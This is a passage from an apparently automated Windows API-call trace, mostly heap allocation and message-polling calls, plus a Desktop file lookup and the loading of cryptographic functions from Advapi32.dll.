Size=0x20) returned 0x2e54738 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.498] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0210.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0210.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.500] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/wg77xQT1-Aj18nXa8K.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f10c0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x1b53ae80, ftLastAccessTime.dwHighDateTime=0x1d5e1ef, ftLastWriteTime.dwLowDateTime=0x1b53ae80, ftLastWriteTime.dwHighDateTime=0x1d5e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x96cc, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="wg77xQT1-Aj18nXa8K.swf", cAlternateFileName="WG77XQ~1.SWF")) returned 0xa86f90 [0210.501] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0210.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0210.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0210.502] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.503] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0210.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.503] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0210.504] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.505] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0210.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0210.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.507] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.507] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.507] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0210.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0210.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0210.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.510] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.510] HeapFree (in: hHeap=0x970000, 